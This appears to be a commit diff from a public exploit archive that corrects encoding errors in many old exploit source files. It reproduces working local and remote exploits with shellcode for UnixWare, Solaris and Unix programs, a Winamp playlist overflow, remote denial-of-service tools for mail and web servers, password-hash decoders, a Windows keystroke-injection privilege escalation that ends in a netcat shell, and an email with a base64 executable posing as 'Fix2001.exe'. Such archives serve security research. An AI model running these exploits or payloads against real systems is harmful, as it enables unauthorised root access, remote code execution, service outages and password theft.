bash-2.02$ id =
uid=3D106(xnec) gid=3D1(other)
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /etc/hosts.equiv
UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory
bash-2.02$ ls -la /usr/bin/uidadmin

34
platforms/sco/local/19656.c
View file

@ -21,7 +21,7 @@ This is exploitable to gain root privileges even though /usr/X/bin/xauto is not
#include <stdlib.h>
#include <stdio.h>
char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */
char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
@ -38,7 +38,7 @@ void buildui() {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/ui.c", "w");
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
@ -49,17 +49,17 @@ void buildui() {
int main(int argc, char *argv[]) {
=
long int offset=3D0;
long int offset=0;
=
int i;
int egglen =3D EGGLEN;
int egglen = EGGLEN;
int retlen;
long int addr;
char egg[EGGLEN];
char ret[RETLEN];
// who needs __asm__? Per Solar Designer's suggestion
unsigned long sp =3D (unsigned long)&sp; =
unsigned long sp = (unsigned long)&sp; =
buildui();
@ -68,22 +68,22 @@ int main(int argc, char *argv[]) {
exit(0); =
}
else if (argc =3D=3D 2){
offset=3Datoi(argv[1]);
retlen=3DRETLEN;
else if (argc == 2){
offset=atoi(argv[1]);
retlen=RETLEN;
}
else if (argc =3D=3D 3) {
offset=3Datoi(argv[1]);
retlen=3Datoi(argv[2]); =
else if (argc == 3) {
offset=atoi(argv[1]);
retlen=atoi(argv[2]); =
}
else {
offset=3D9400;
retlen=3D2000;
offset=9400;
retlen=2000;
=
}
addr=3Dsp + offset;
addr=sp + offset;
=
fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid
@ -96,12 +96,12 @@ int main(int argc, char *argv[]) {
memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
=
for(i=3DALIGN;i< retlen-4;i+=3D4)
*(int *)&ret[i]=3Daddr; =
for(i=ALIGN;i< retlen-4;i+=4)
*(int *)&ret[i]=addr; =
=
memcpy(egg, "EGG=3D", 4);
memcpy(egg, "EGG=", 4);
putenv(egg);
execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); =

24
platforms/sco/local/19674.c
View file

@ -29,7 +29,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with =
** "set $eip =3D 0x8046b75" and "continue" twice.
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
@ -40,7 +40,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g
#include <stdlib.h>
#include <stdio.h>
char scoshell[]=3D /* This isn't a buffer overflow! really! */
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
@ -66,11 +66,11 @@ void usage(int ftype) {
void buildsm(int ftype) {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/sm.c", "w");
fp = fopen("/tmp/sm.c", "w");
if (ftype =3D=3D 1) fprintf(fp, DACREAD);
else if(ftype =3D=3D 2) fprintf(fp, DACWRITE);
else if(ftype =3D=3D 3) fprintf(fp, SETUID);
if (ftype == 1) fprintf(fp, DACREAD);
else if(ftype == 2) fprintf(fp, DACWRITE);
else if(ftype == 3) fprintf(fp, SETUID);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
@ -81,20 +81,20 @@ void buildsm(int ftype) {
int main(int argc, char *argv[]) {
int i;
int buflen =3D LEN;
int buflen = LEN;
char buf[LEN]; =
int filetype =3D 0;
int filetype = 0;
char filebuf[20]; =
if(argc > 2 || argc =3D=3D 1) {
if(argc > 2 || argc == 1) {
usage(filetype);
exit(0); =
}
if ( argc > 1 ) filetype=3Datoi(argv[1]);
if ( argc > 1 ) filetype=atoi(argv[1]);
if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
buildsm(filetype);
@ -104,9 +104,9 @@ fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
memcpy(buf, "XNEC=3D", 5);
memcpy(buf, "XNEC=", 5);
putenv(buf);
buf[buflen - 1] =3D 0;
buf[buflen - 1] = 0;
system("/bin/sh");
exit(0);

22
platforms/solaris/local/19529.c
View file

@ -8,7 +8,7 @@ A buffer overflow vulnerability in the '/usr/bin/mail' program's handling of the
* Shellcode by Cheez Whiz (fixes problem with shells dropping egid if it=
doesn't match your real gid)
* Will set gid=3D6(mail)
* Will set gid=6(mail)
*
* gcc -o mailex solx86gid.c
* /usr/bin/mail -m `./mailex 0 1975 2285` foo
@ -31,7 +31,7 @@ doesn't match your real gid)
#define NOP 0x90
char shell[] =3D
char shell[] =
/* 0 */ "\xeb\x45" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
@ -90,29 +90,29 @@ main (int argc, char *argv[])
if (argc > 1)
offset =3D strtol(argv[1], NULL, 0);
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop =3D strtoul(argv[2], NULL, 0);
nop = strtoul(argv[2], NULL, 0);
else
nop =3D 285;
nop = 285;
if (argc > 3)
buflen=3Datoi(argv[3]);
buflen=atoi(argv[3]);
else =
buflen=3DBUF;
buflen=BUF;
=
esp =3D get_esp();
esp = get_esp();
memset(buf, NOP, buflen);
memcpy(buf+nop, shell, strlen(shell));
for (i =3D nop+strlen(shell); i < buflen-4; i +=3D 4)
*((int *) &buf[i]) =3D esp+offset;
for (i = nop+strlen(shell); i < buflen-4; i += 4)
*((int *) &buf[i]) = esp+offset;
for (i =3D 0; i < strlen(buf); i++) putchar(buf[i]);
for (i = 0; i < strlen(buf); i++) putchar(buf[i]);
return;
}

41
platforms/solaris/local/19872.c
View file

@ -1,8 +1,9 @@
source: http://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
/*=20
/*
*
* solaris 2.7 lpset local exploit, i386.
* discovered by: duke
@ -21,7 +22,7 @@ A vulnerability exists in the handling of the -r option to the lpset program, as
#include <stdlib.h>
#include <string.h>
char shellcode[] =3D
char shellcode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
@ -33,36 +34,36 @@ long get_esp() { __asm__("movl %esp,%eax"); }
int main (int argc, char *argv[]) {
long offset=3D410;
int nop=3D64;
int gab=3D40;
long offset=410;
int nop=64;
int gab=40;
long addr;
char buffer[210];
int i, a, b;
if (argc > 1) offset =3D strtol(argv[1], NULL, 0);
if (argc > 2) gab =3D strtol(argv[2], NULL, 0);
if (argc > 3) nop =3D strtol(argv[2], NULL, 0);
if (argc > 1) offset = strtol(argv[1], NULL, 0);
if (argc > 2) gab = strtol(argv[2], NULL, 0);
if (argc > 3) nop = strtol(argv[2], NULL, 0);
for (a =3D 0; a <gab; a++)
buffer[a] =3D 'A';
for (a = 0; a <gab; a++)
buffer[a] = 'A';
addr =3D get_esp() + offset;
addr = get_esp() + offset;
buffer[a++] =3D addr & 0x000000ff;
buffer[a++] =3D (addr & 0x0000ff00) >> 8;
buffer[a++] =3D (addr & 0x00ff0000) >> 16;
buffer[a++] =3D (addr & 0xff000000) >> 24;
buffer[a++] = addr & 0x000000ff;
buffer[a++] = (addr & 0x0000ff00) >> 8;
buffer[a++] = (addr & 0x00ff0000) >> 16;
buffer[a++] = (addr & 0xff000000) >> 24;
for ( ; a < nop; a++)
buffer[a] =3D 0x90;
buffer[a] = 0x90;
for (b =3D 0; b < strlen(shellcode); b++, a++)
buffer[a] =3D shellcode[b];
for (b = 0; b < strlen(shellcode); b++, a++)
buffer[a] = shellcode[b];
buffer[strlen(buffer)] =3D '\0';
buffer[strlen(buffer)] = '\0';
printf("addr =3D 0x%x\n", addr);
printf("addr = 0x%x\n", addr);
execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL);
}

30
platforms/unix/local/22335.pl
View file

@ -5,30 +5,30 @@ It has been reported that a buffer overflow exists in Tower Toppler. A local use
#!/usr/bin/perl
#kokanin@dtors.net playing a game
#hi bob
$len =3D 1024;
$ret =3D 0xbfbffd31;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D =
$len = 1024;
$ret = 0xbfbffd31;
$nop = "\x90";
$offset = 0;
$shellcode = =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9\x9d;
if (@ARGV =3D=3D 1) {
$offset =3D $ARGV[0];
if (@ARGV == 1) {
$offset = $ARGV[0];
}
=20
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .=3D $nop;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
=20
$buffer .=3D $shellcode;
$buffer .= $shellcode;
$new_ret =3D pack('l', ($ret + $offset));
$new_ret = pack('l', ($ret + $offset));
=20
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
$buffer .=3D $new_ret;
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20
local($ENV{'EGG'}) = $buffer;=20
local($ENV{'DISPLAY'}) = $new_ret x 64;=20
exec("toppler 2>/dev/null");

54
platforms/unixware/remote/19705.c
View file

@ -31,7 +31,7 @@ The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnera
#define NOP 0x90
#define LEN 102
char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */
char shell[] = /* Cheez Whiz, cheezbeast@hotmail.com */
"\xeb\x5f" /* jmp springboard */
"\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
"\xc3" /* ret */
@ -78,7 +78,7 @@ char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */
"\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
"\x2d\x63\xff"; /* DATA */
char *auth=3D
char *auth=
" HTTP/1.0\r\n"
"Host: localhost:457\r\n"
"Accept: text/html\r\n"
@ -89,13 +89,13 @@ char *auth=3D
char buf[BUFLEN];
char exploit[BUFLEN];
char *cmd =3D "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
char *cmd = "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
int len,i,sock;
int size =3D 368;
int offset=3D300;
int port =3D 457;
long sp =3D 0xbffc6004;
//unsigned long sp =3D (unsigned long)&sp;
int size = 368;
int offset=300;
int port = 457;
long sp = 0xbffc6004;
//unsigned long sp = (unsigned long)&sp;
struct sockaddr_in sock_a;
struct hostent *host;
@ -106,20 +106,20 @@ void main (int argc, char *argv[]) {
fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
exit(0);
}
if(argc > 2) offset=3Datoi(argv[2]);
if(argc > 3) size=3Datoi(argv[3]);
if(argc > 2) offset=atoi(argv[2]);
if(argc > 3) size=atoi(argv[3]);
=
sp =3D sp + offset;
sp = sp + offset;
memset(exploit, NOP, size - strlen(shell) - strlen(cmd)- 6);
/* put size of *cmd into shellcode */
len =3D strlen(cmd); len++; len =3D -len;
shell[LEN+0] =3D (len >> 0) & 0xff;
shell[LEN+1] =3D (len >> 8) & 0xff;
shell[LEN+2] =3D (len >> 16) & 0xff;
shell[LEN+3] =3D (len >> 24) & 0xff;
len = strlen(cmd); len++; len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
memcpy(exploit+(size-strlen(shell)-strlen(cmd)-6), shell, strlen(shell))=
;
@ -128,37 +128,37 @@ void main (int argc, char *argv[]) {
=
exploit[size-5]=3D(sp & 0x000000ff);
exploit[size-4]=3D(sp & 0x0000ff00) >> 8;
exploit[size-3]=3D(sp & 0x00ff0000) >> 16;
exploit[size-2]=3D(sp & 0xff000000) >> 24;
exploit[size-1]=3D0; =
exploit[size-5]=(sp & 0x000000ff);
exploit[size-4]=(sp & 0x0000ff00) >> 8;
exploit[size-3]=(sp & 0x00ff0000) >> 16;
exploit[size-2]=(sp & 0xff000000) >> 24;
exploit[size-1]=0; =
sprintf(buf, "GET /%s %s%s\r\n\r\n", exploit, auth,exploit);
buf[BUFLEN - 1] =3D 0;
buf[BUFLEN - 1] = 0;
fprintf(stderr, "httpd remote exploit for UnixWare 7.1\n");
fprintf(stderr, "using addr 0x%x offset %d\n", sp, offset);
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
if((host=3D(struct hostent *)gethostbyname(argv[1])) =3D=3D NULL) {
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror("gethostbyname"); =
exit(-1);
}
=
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=3DAF_INET;
sock_a.sin_port=3Dhtons(port);
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(port);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=3D0) {
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}

17
platforms/windows/dos/19720.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/925/info
Winamp, a program for playing mp3 and other audio files, uses playlist files (*.pls) to store lists of files for playback. The code that reads these files has an unchecked buffer which can be overflowed to cause arbitrary code to be executed. If an entry longer than 580 bytes is specified in the file, EIP gets overwritten.
This vulnerability can only be exploited remotely by convincing someone to download the hostile playlist and load it into Winamp. IE5 will download .pls files without user confirmation if winamp is installed.
*/
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
@ -28,8 +30,8 @@ int main()
printf("\t\t.......................................\n\n");
char buffer[640];
char eip[8] =3D "\xF7\xCF\xB9\xBF";
char sploit[256] =3D =
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] = =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\=
xFA\x2E\xC6
@ -43,22 +45,21 @@ xEC\xBA\xFF
FILE *file;
for(int x=3D0;x<580;x++)
for(int x=0;x<580;x++)
{
buffer[x] =3D 0x90;
buffer[x] = 0x90;
}
file =3D fopen("crAsh.pls","wb");
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=3D");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=3D1");
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}

26
platforms/windows/dos/19806.c
View file

@ -35,16 +35,16 @@ main (int argc, char **argv)
struct hostent *he;
fprintf (stderr,
"\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n");
"\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
if (argc < 2)
usage (argv[0]);
type =3D 0;
type = 0;
if (argc > 2)
type =3D atol (argv[2]);
type = atol (argv[2]);
ptr =3D buffer;
ptr = buffer;
switch (type)
{
case 1:
@ -76,38 +76,38 @@ buffer);
break;
}
if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
return -1;
}
if ((he =3D gethostbyname (argv[1])) !=3D NULL)
if ((he = gethostbyname (argv[1])) != NULL)
{
ip =3D *(unsigned long *) he->h_addr;
ip = *(unsigned long *) he->h_addr;
}
else
{
if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)
if ((ip = inet_addr (argv[1])) == NULL)
{
perror ("inet_addr()");
return -1;
}
}
sin.sin_family =3D AF_INET;
sin.sin_addr.s_addr =3D ip;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
switch (type)
{
case 1:
sin.sin_port =3D htons (110);
sin.sin_port = htons (110);
break;
case 2:
sin.sin_port =3D htons (25);
sin.sin_port = htons (25);
break;
default:
sin.sin_port =3D htons (143);
sin.sin_port = htons (143);
break;
}

6
platforms/windows/dos/21830.py
View file

@ -7,8 +7,8 @@ vulnerability
# Tested on: windows 7 Ultimate k
# Language : python
f =3D open("hack.avi", "wb")
data =3D "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
f = open("hack.avi", "wb")
data = "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
" \
"\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" =
\
@ -41,7 +41,7 @@ f.write(data)
for i in range(0, 0x71a):
f.write("\x00")
data =3D "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
x3d\x4c\x00"
f.write(data)

14
platforms/windows/dos/23234.c
View file

@ -41,7 +41,7 @@ SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested =3D MAKEWORD (2,0);
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
@ -56,7 +56,7 @@ ExitProcess (0);
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav =3D (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
@ -66,20 +66,20 @@ lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family =3D AF_INET;
sin.sin_port =3D htons (80);
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=3Dinet_addr (argv[1])) =3D=3D INADDR_NONE)
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 =3D socket (AF_INET, SOCK_STREAM, 0);
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) =3D=3D SOCKET_ERROR )
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else

2
platforms/windows/dos/28897.txt
View file

@ -11,4 +11,4 @@ charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: about:blank
<iframe name=3Difr src=3D"">
<iframe name=ifr src="">

8
platforms/windows/local/20401.txt
View file

@ -25,10 +25,10 @@ Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"
filename="Fix2001.exe"
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
@ -60,10 +60,10 @@ Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"
filename="Fix2001.exe"
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g

58
platforms/windows/local/20407.c
View file

@ -32,61 +32,61 @@ MailMaxSize=20
#define DEFAULT 3
void main() {
unsigned char start_table[4][8] =3D {
unsigned char start_table[4][8] = {
{ 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
{ 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
{ 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
{ 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33} };
unsigned char uname =3D 0x46; /* Just the first character from DIR=3D =
unsigned char uname = 0x46; /* Just the first character from DIR= =
entry */
unsigned char hash[8] =3D { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(uname >=3D 0x30 && uname <=3D39) {
for(i=3D0;i<=3D7;i++) {
hash[i]+=3D1; }
if(uname >= 0x30 && uname <=39) {
for(i=0;i<=7;i++) {
hash[i]+=1; }
}
for(i=3D0;i<8;i++) {
if(hash[i] =3D=3D start_table[DEFAULT][i]) {
pass[i] =3D uname;
for(i=0;i<8;i++) {
if(hash[i] == start_table[DEFAULT][i]) {
pass[i] = uname;
continue; }
range=3DLOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >=3D start_table[DIGIT][i] && hash[i] <=3D =
range=LOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >= start_table[DIGIT][i] && hash[i] <= =
(start_table[DIGIT][i] + 0x0a))
range =3D DIGIT;
if(hash[i] >=3D start_table[UPPER][i] && hash[i] <=3D =
range = DIGIT;
if(hash[i] >= start_table[UPPER][i] && hash[i] <= =
(start_table[UPPER][i] + 0x1a))
range=3DUPPER;
if(hash[i] >=3D start_table[LOWER][i] && hash[i] <=3D =
range=UPPER;
if(hash[i] >= start_table[LOWER][i] && hash[i] <= =
(start_table[LOWER][i] + 0x1a))
range=3DLOWER;
range=LOWER;
if(range=3D=3DDIGIT) {
if(i=3D=3D2 || i=3D=3D5) {
if(range==DIGIT) {
if(i==2 || i==5) {
if(hash[i] < 0x73) {
hash[i] =3D hash[i] + 0x5e; } }
pass[i] =3D ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
if(range=3D=3DUPPER) {
pass[i] =3D ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >=3D uname)
pass[i]+=3D1; }
if(range==UPPER) {
pass[i] = ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >= uname)
pass[i]+=1; }
if(range=3D=3DLOWER) {
if(i=3D=3D1 || i =3D=3D7) {
if(range==LOWER) {
if(i==1 || i ==7) {
if(hash[i] < 0x73) {
hash[i] =3D hash[i] + 0x5e; } }
pass[i] =3D ( hash[i] - start_table[LOWER][i] ) + 0x61; }
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[LOWER][i] ) + 0x61; }
}
printf("The password is:\n\t");
for(i=3D0;i<8;i++) {
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");

56
platforms/windows/local/20409.c
View file

@ -16,47 +16,47 @@ by NetCplus */
int main() {
unsigned char start[8] =3D { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
unsigned char start[8] = { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
0x3a };
unsigned char hash[8] =3D { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
unsigned char hash[8] = { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
/* Enter the encrypted password into hash above */
unsigned char except[8] =3D { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] =3D { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char except[8] = { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] = { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(hash[0] >=3D '!' && hash[0] <=3D '&')
hash[0]=3D(hash[0] - 0x20) + 0x7e;
for(i=3D0;i<8;i++) {
if(hash[i] >=3D except[i] && hash[i] <=3D (except[i] + 6) ) {
pass[i]=3Dex_order[ (hash[i] - except[i]) ]; }
if(hash[0] >= '!' && hash[0] <= '&')
hash[0]=(hash[0] - 0x20) + 0x7e;
for(i=0;i<8;i++) {
if(hash[i] >= except[i] && hash[i] <= (except[i] + 6) ) {
pass[i]=ex_order[ (hash[i] - except[i]) ]; }
else {
if(hash[i] < start[i]) {
hash[i]+=3D0x5e;
}
pass[i]=3Dhash[i] - start[i] + '!';
if(hash[i] < start[i]) {
hash[i]+=0x5e;
}
pass[i]=hash[i] - start[i] + '!';
if(pass[i] >=3D 'B')
pass[i]+=3D1;
if(pass[i] >=3D 'L')
pass[i]+=3D1;
if(pass[i] >=3D 'O')
pass[i]+=3D1;
if(pass[i] >=3D 'R')
pass[i]+=3D1;
if(pass[i] >=3D 'm')
pass[i]+=3D1;
if(pass[i] >=3D 's')
pass[i]+=3D1;
if(pass[i] >=3D 't')
pass[i]+=3D1;
if(pass[i] >= 'B')
pass[i]+=1;
if(pass[i] >= 'L')
pass[i]+=1;
if(pass[i] >= 'O')
pass[i]+=1;
if(pass[i] >= 'R')
pass[i]+=1;
if(pass[i] >= 'm')
pass[i]+=1;
if(pass[i] >= 's')
pass[i]+=1;
if(pass[i] >= 't')
pass[i]+=1;
}
}
printf("The password is:\n\t");
for(i=3D0;i<8;i++) {
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");

54
platforms/windows/local/26222.c
View file

@ -71,7 +71,7 @@ restriction.
* 1140 explorer.exe Program Manager
*
* C:\>c:\keybd.exe 1140
* HANDLE Found. Attacking =3D)
* HANDLE Found. Attacking =)
*
* C:\>nc localhost 65535
* Microsoft Windows 2000 [Versi=F3n 5.00.2195]
@ -82,7 +82,7 @@ restriction.
* AQUARIUS\Administrador
*
*
* DONE =3D)
* DONE =)
*
*/
@ -92,8 +92,8 @@ restriction.
#pragma comment(lib, "ws2_32.lib")
#define HAXORCITOS 65535
unsigned int pid =3D 0;
char buf[256]=3D"";
unsigned int pid = 0;
char buf[256]="";
/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
@ -103,24 +103,24 @@ int i;
GetWindowThreadProcessId(hwnd,&hwndid);
if (hwndid =3D=3D pid){
if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls=20
*/
printf("HANDLE Found. Attacking =3D)\n");
printf("HANDLE Found. Attacking =)\n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=3D0;i<strlen(buf);i++) {
if (buf[i]=3D=3D':') {
for(i=0;i<strlen(buf);i++) {
if (buf[i]==':') {
keybd_event(VK_SHIFT,1,0,0);
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
} else {
if (buf[i]=3D=3D'\\') {
if (buf[i]=='\\') {
keybd_event(VK_LMENU,1,0,0);
keybd_event(VK_CONTROL,1,0,0);
keybd_event(VkKeyScan('=BA'),1,0,0);
@ -149,29 +149,29 @@ WSADATA HWSAdata;
struct sockaddr_in sa;
int len;
